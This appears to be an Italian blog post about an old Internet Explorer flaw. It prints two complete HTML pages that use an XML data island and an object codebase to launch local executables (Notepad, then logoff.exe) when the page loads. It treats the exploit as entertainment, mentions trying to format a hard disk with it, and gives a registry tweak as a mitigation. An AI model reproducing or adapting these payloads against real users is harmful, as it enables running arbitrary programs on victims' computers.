Discutevo in chat qualche minuto fa con David. Mi ha fatto partecipe di un exploit di IE che personalmente non conoscevo.
E' sufficiente inserire questo codice in una pagina html:
<html> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/notepad.exe"> </object> ]]> </exploit> </security> </xml> </body> </html>
Per avviare qualsiasi file .exe presente sull'HD del computer in viene richiamata una pagina con questo codice - nell'esempio viene aperto il blocco note. Naturalmente - da buon masochista - ho provato sul mio computer a formattare l'hd ma, con mio immenso dispiacere, confesso che ci sono rimasto male, non ci sono riuscito.
E poi qualcuno mi chiede perché preferisco Mozilla che è immune da questo problema... Tzé!
A parte questo, sembra che modificando il registro di sistema com Regedit in questo modo:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 ]
e cambiando il valore "di 1004" (DWORD) da "0" a "3" il problema scompaia. Ma quali divertimenti possono nascere da questo exploit? Proviamo a modificare il codice qui sopra in questo modo:
<html> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/logoff.exe"> </object> ]]> </exploit> </security> </xml> </body> </html>
E vedremo effettuare il logout del computer...
Per inserire un commento, devi avere un account.
Fai il login e torna a questa pagina, oppure registrati alla nostra community.
- Assembly 6510: programmazione vintage, il 30 dicembre 2016 alle 17:20
- 50, il 31 dicembre 2014 alle 14:10
- SCRIBEFIRE4DSteutfocSCRIBEFIRE, il 16 novembre 2009 alle 02:52
- [OT] GMail pensasse ai suoi bug, non alla meteorologia, il 10 novembre 2009 alle 18:21
- Excel e i formati aperti, il 25 ottobre 2008 alle 14:00
- Io... e il mio tempo, il 18 ottobre 2008 alle 14:58